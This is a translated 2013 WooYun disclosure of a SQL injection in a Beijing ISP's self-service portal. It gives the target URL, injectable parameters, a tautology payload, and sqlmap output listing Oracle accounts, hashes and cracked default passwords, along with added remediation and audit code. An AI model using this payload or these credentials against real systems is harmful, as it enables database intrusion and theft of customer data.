
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-038247

Title: SQL injection in a 北京宽带通 system leaks the records of a million users

Vendor: 北京宽带通

Author: 想要减肥的胖纸

Submitted: 2013-09-26 13:23

Fix date: 2013-11-10 13:24

Public disclosure: 2013-11-10 13:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-09-26: Details sent to the vendor, awaiting vendor action
2013-09-30: Vendor confirmed; details visible to the vendor only
2013-10-10: Details opened to core white hats and domain experts
2013-10-20: Details opened to regular white hats
2013-10-30: Details opened to intern white hats
2013-11-10: Details made public

Summary:

A million user records.

Details:

The injection requires being logged in.
http://sqsvc.btte.net/self-service/udr.do?method=QueryForList
POST: startyear=2011&startmonth=02
My own family is on 宽带通; 50 Mb for two years, dirt cheap....

org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [ select b.* from ( select a.*,rownum row_id from ( select to_char(u.STARTTIME,'yyyy-mm-dd hh24:mi:ss') STARTTIME, to_char(u.STOPTIME,'yyyy-mm-dd hh24:mi:ss') STOPTIME, GWIP, SESSIONID, ID, USERNAME, SCHEMADETAILID, PRODUCTID, CUSTID, CALLINGID, CALLEDID, FRAMEDIPADDR, NASIDENTIFIER, NASPORTTYPE, NASPORTID, NASPORT, DURATION, DOWNOCTETS, UPOCTETS, DISCONNECTCAUSE, STREAMUSAGE, CHARGEFLAG, INSERTTIME,DURATIONUSAGE from bssudr u where u.custid=159192580 AND  to_char(STARTTIME,'yyyy-mm') = '2002-01'' ORDER BY ID asc ) a  ) b where row_id>0 and row_id<=10]; nested exception is java.sql.SQLException: ORA-01756: quoted string not properly terminated
org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:89)
org.springframework.jdbc.support.SQLErrorCodeSQLExceptionTranslator.translate(SQLErrorCodeSQLExceptionTranslator.java:258)
org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:294)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:348)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:352)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:356)
org.springframework.jdbc.core.JdbcTemplate.queryForList(JdbcTemplate.java:387)
com.dfrk.udr.udrImpl.getList(udrImpl.java:81)
sun.reflect.GeneratedMethodAccessor55.invoke(Unknown Source)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
java.lang.reflect.Method.invoke(Method.java:585)
org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:287)
org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:181)
org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:148)
org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:96)
org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:170)
org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:176)
$Proxy3.getList(Unknown Source)
com.dfrk.udr.udrAction.QueryForList(udrAction.java:98)
sun.reflect.GeneratedMethodAccessor54.invoke(Unknown Source)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
java.lang.reflect.Method.invoke(Method.java:585)
org.apache.struts.actions.DispatchAction.dispatchMethod(DispatchAction.java:274)
org.apache.struts.actions.DispatchAction.execute(DispatchAction.java:194)
org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:419)
org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:224)
org.apache.struts.action.ActionServlet.process(ActionServlet.java:1194)
org.apache.struts.action.ActionServlet.doPost(ActionServlet.java:432)
javax.servlet.http.HttpServlet.service(HttpServlet.java:710)
javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
com.dfrk.filter.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:52)


Submit a single quote and it errors out....
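The stack trace above shows the whole problem: `startyear` and `startmonth` from the POST body are concatenated into the `to_char(STARTTIME,'yyyy-mm') = '...'` literal, so a stray quote produces ORA-01756 and a crafted value changes the query. The following is an added example, not code from the original report or from the vendor's application. It reproduces the query's shape with an in-memory SQLite table standing in for the Oracle `BSSUDR` table (column names taken from the leaked statement, rows constructed, `strftime` replacing `to_char`), runs the unsafe concatenation beside a version that allow-lists the two parameters and binds them, and returns what each did. The customer id is the one visible in the leaked SQL; the table contents are made up.

```python
"""Added example (not from the original report or the vendor's code):
the shape of the udr.do query, why a quote breaks it, and the fix.

An in-memory SQLite table stands in for the Oracle BSSUDR table seen in
the leaked statement; strftime('%Y-%m', ...) replaces Oracle's
to_char(STARTTIME, 'yyyy-mm'). Rows are constructed test data."""
import re
import sqlite3

CUST_ID = 159192580  # custid of the logged-in customer, as seen in the leaked SQL


def demo_db():
    """Constructed stand-in for BSSUDR: two rows for our customer, one for another."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE bssudr (id INTEGER, custid INTEGER, starttime TEXT, username TEXT)")
    con.executemany("INSERT INTO bssudr VALUES (?, ?, ?, ?)", [
        (1, CUST_ID, "2011-02-03 10:00:00", "cust_self"),
        (2, CUST_ID, "2011-03-01 09:30:00", "cust_self"),
        (3, 42, "2011-02-10 12:00:00", "someone_else"),
    ])
    return con


def query_vulnerable(con, custid, startyear, startmonth):
    """Mirrors the leaked statement: startyear/startmonth are pasted into the SQL text.
    A quote in either parameter ends the literal early (ORA-01756 on Oracle); a
    tautology after the quote defeats the custid predicate entirely."""
    sql = ("SELECT id, username FROM bssudr u WHERE u.custid=" + str(custid)
           + " AND strftime('%Y-%m', starttime) = '" + str(startyear) + "-" + str(startmonth)
           + "' ORDER BY id ASC")
    return con.execute(sql).fetchall()


def query_hardened(con, custid, startyear, startmonth):
    """Allow-list both parameters to the only shape they can legitimately have, then bind.
    Binding alone already prevents injection; the validation turns garbage into a clean
    client error instead of a stack trace leaking the schema."""
    if not re.fullmatch(r"\d{4}", str(startyear)) or not re.fullmatch(r"\d{2}", str(startmonth)):
        raise ValueError("startyear must be 4 digits and startmonth 2 digits")
    if not 1 <= int(startmonth) <= 12:
        raise ValueError("startmonth out of range")
    sql = ("SELECT id, username FROM bssudr u WHERE u.custid=? "
           "AND strftime('%Y-%m', starttime) = ? ORDER BY id ASC")
    return con.execute(sql, (custid, f"{startyear}-{startmonth}")).fetchall()


def demo():
    """Run both versions against the same inputs and return what each one did."""
    con = demo_db()
    out = {
        "vulnerable_normal": query_vulnerable(con, CUST_ID, "2011", "02"),
        "hardened_normal": query_hardened(con, CUST_ID, "2011", "02"),
        # AND binds tighter than OR, so the injected tautology returns every customer's rows
        "vulnerable_tautology": query_vulnerable(con, CUST_ID, "2011", "02' OR '1'='1"),
    }
    try:
        query_vulnerable(con, CUST_ID, "2002", "01'")  # same input as the report's error
        out["vulnerable_quote"] = "no error"
    except sqlite3.OperationalError as exc:
        out["vulnerable_quote"] = "syntax error: " + str(exc)
    for label, month in (("quote", "01'"), ("tautology", "02' OR '1'='1")):
        try:
            query_hardened(con, CUST_ID, "2002", month)
            out["hardened_" + label] = "no error"
        except ValueError as exc:
            out["hardened_" + label] = "rejected: " + str(exc)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The tautology case is the one that matters for the impact claimed in this report: even though the statement carries a `custid` predicate for the logged-in user, `' OR '1'='1` turns the WHERE clause into "my rows OR everything", which is how an authenticated self-service page ends up exposing other customers' data.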

Proof of concept:

[*] _NEXT_USER [1]:
password hash: NULL
[*] ANONYMOUS [1]:
password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
password hash: NULL
[*] AQ_USER_ROLE [1]:
password hash: NULL
[*] AUTHENTICATEDUSER [1]:
password hash: NULL
[*] BILL [1]:
password hash: CC249ABB49423C1E
[*] BOSS [1]:
password hash: A472100D4E2AEFE8
[*] CONNECT [1]:
password hash: NULL
[*] CTXAPP [1]:
password hash: NULL
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
clear-text password: CHANGE_ON_INSTALL
[*] CWM_USER [1]:
password hash: NULL
[*] DBA [1]:
password hash: NULL
[*] DBSNMP [1]:
password hash: 9CF003410A739C6E
clear-text password: SYS
[*] DELETE_CATALOG_ROLE [1]:
password hash: NULL
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
clear-text password: DMSYS
[*] EJBCLIENT [1]:
password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
password hash: NULL
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
password hash: GLOBAL
[*] HATEST [1]:
password hash: 2428525244F46E78
clear-text password: HATEST
[*] HS_ADMIN_ROLE [1]:
password hash: NULL
[*] IMP_FULL_DATABASE [1]:
password hash: NULL
[*] JAVA_ADMIN [1]:
password hash: NULL
[*] JAVA_DEPLOY [1]:
password hash: NULL
[*] JAVADEBUGPRIV [1]:
password hash: NULL
[*] JAVAIDPRIV [1]:
password hash: NULL
[*] JAVASYSPRIV [1]:
password hash: NULL
[*] JAVAUSERPRIV [1]:
password hash: NULL
[*] KEFU [1]:
password hash: 744813B3A9664A05
clear-text password: KEFU
[*] LOGSTDBY_ADMINISTRATOR [1]:
password hash: NULL
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
clear-text password: MDSYS
[*] MGMT_USER [1]:
password hash: NULL
[*] MGMT_VIEW [1]:
password hash: 97468D731528F016
[*] OEM_ADVISOR [1]:
password hash: NULL
[*] OEM_MONITOR [1]:
password hash: NULL
[*] OLAP_DBA [1]:
password hash: NULL
[*] OLAP_USER [1]:
password hash: NULL
[*] OLAPI_TRACE_USER [1]:
password hash: NULL
[*] OLAPSYS [1]:
password hash: invalid
[*] ORACLE_OCM [1]:
password hash: 6D17CF1EB1611F94
clear-text password: ORACLE_OCM
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] PUBLIC [1]:
password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
password hash: NULL
[*] RESOURCE [1]:
password hash: NULL
[*] SCHEDULER_ADMIN [1]:
password hash: NULL
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
password hash: NULL
[*] SELFAAA [1]:
password hash: AC6792E5D2B3639D
clear-text password: 123456
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
password hash: 5638228DAF52805F
clear-text password: MANAGER
[*] SYSMAN [1]:
password hash: 447B729161192C24
clear-text password: SYSMAN
[*] SYSTEM [1]:
password hash: D4DF7931AB130E37
clear-text password: MANAGER
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
clear-text password: TSMSYS
[*] VINCENT [1]:
password hash: CA4C68AFC00A6AF9
[*] WM_ADMIN_ROLE [1]:
password hash: NULL
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
clear-text password: WMSYS
[*] XDB [1]:
password hash: 88D8364765FCE6AF
clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
password hash: NULL
[*] XDBWEBSERVICES [1]:
password hash: NULL

Lots of default passwords.
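The dump above is the `[*] USER [n]: / password hash: / clear-text password:` format sqlmap prints for Oracle, and the remediation section asks for the default passwords to be changed. Below is an added example (not part of the original report) that parses that format and flags accounts that are still on a vendor default, use their own username as the password, or use a trivially guessable one. The excerpt it runs on is a subset of the entries shown above; the lists of vendor defaults and weak passwords are a small hand-picked assumption, not an authoritative Oracle list. Entries whose "hash" is not a 16-hex-digit legacy Oracle hash (roles showing `NULL`, the `anonymous`/`invalid` markers) are skipped as not being local passwords.

```python
"""Added example (not from the original report): audit a sqlmap-style
Oracle password dump for default and weak passwords.

SAMPLE_DUMP is an excerpt of the report's output; KNOWN_DEFAULTS and
COMMON_WEAK are assumptions, a hand-picked set rather than an exhaustive
list of Oracle installation defaults."""
import re

# Vendor defaults for a few stock accounts (assumed list, limited to ones in the report).
KNOWN_DEFAULTS = {
    "SYS": {"CHANGE_ON_INSTALL"},
    "SYSTEM": {"MANAGER"},
    "SCOTT": {"TIGER"},
    "OUTLN": {"OUTLN"},
    "DBSNMP": {"DBSNMP"},
    "CTXSYS": {"CTXSYS", "CHANGE_ON_INSTALL"},
    "XDB": {"XDB", "CHANGE_ON_INSTALL"},
}
COMMON_WEAK = {"123456", "PASSWORD", "ORACLE", "WELCOME", "CHANGE_ON_INSTALL", "MANAGER"}

# Excerpt in the exact layout sqlmap prints (copied from the report's output above).
SAMPLE_DUMP = """\
[*] ANONYMOUS [1]:
password hash: anonymous
[*] BILL [1]:
password hash: CC249ABB49423C1E
[*] DBA [1]:
password hash: NULL
[*] KEFU [1]:
password hash: 744813B3A9664A05
clear-text password: KEFU
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SELFAAA [1]:
password hash: AC6792E5D2B3639D
clear-text password: 123456
[*] SYS [1]:
password hash: 5638228DAF52805F
clear-text password: MANAGER
[*] SYSTEM [1]:
password hash: D4DF7931AB130E37
clear-text password: MANAGER
"""

ENTRY_RE = re.compile(r"^\[\*\] (?P<user>\S+) \[\d+\]:$")
LEGACY_HASH_RE = re.compile(r"^[0-9A-F]{16}$")  # pre-11g DES-based hash as sqlmap prints it


def parse_dump(text):
    """Return {username: {"hash": str|None, "password": str|None}} from sqlmap output."""
    accounts, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = ENTRY_RE.match(line)
        if m:
            current = m.group("user")
            accounts[current] = {"hash": None, "password": None}
        elif current and line.startswith("password hash:"):
            value = line.split(":", 1)[1].strip()
            accounts[current]["hash"] = value if LEGACY_HASH_RE.match(value) else None
        elif current and line.startswith("clear-text password:"):
            accounts[current]["password"] = line.split(":", 1)[1].strip()
    return accounts


def classify(username, entry):
    """List the reasons one account is a problem; empty list means nothing proven."""
    findings = []
    if entry["hash"] is None or entry["password"] is None:
        return findings  # a role, a non-local account, or a hash the wordlist did not crack
    pw = entry["password"]
    if pw.upper() == username.upper():
        findings.append("password equals username")
    if pw in KNOWN_DEFAULTS.get(username, set()):
        findings.append("vendor default for this account")
    if pw in COMMON_WEAK:
        findings.append("common weak password")
    return findings


def audit(text):
    """Map each flagged account to its findings."""
    report = {}
    for user, entry in parse_dump(text).items():
        findings = classify(user, entry)
        if findings:
            report[user] = findings
    return report


if __name__ == "__main__":
    for user, findings in sorted(audit(SAMPLE_DUMP).items()):
        print(f"{user}: {', '.join(findings)}")
```

Accounts such as BILL, BOSS, MGMT_VIEW or VINCENT in the full dump have a hash but no recovered clear text; that only means the wordlist missed, not that the password is strong, so they belong on the same change-password list as the flagged ones.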

back-end DBMS: Oracle
available databases [17]:
[*] BILL
[*] BOSS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

The BILL database seems to hold the internet usage records that get looked up?

Database: BOSS
+--------------+---------+
| Table | Entries |
+--------------+---------+
| BSSCUSTOMERS | 993994 |
+--------------+---------+

A million records.
The leaked information includes ID card numbers, home addresses, phone numbers, names and so on. The impact is severe.

[screenshot: QQ20130926-1@2x.png]


I believe Oracle Java stored procedures or the like could be used to get access to the server, but if the database went down I'd be in real trouble.

Remediation:

Filter the input.
Harden the server, and change the Oracle default passwords.

Copyright: please credit 想要减肥的胖纸@乌云 when reposting.


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2013-09-30 21:04

Vendor reply:

Latest status:

None yet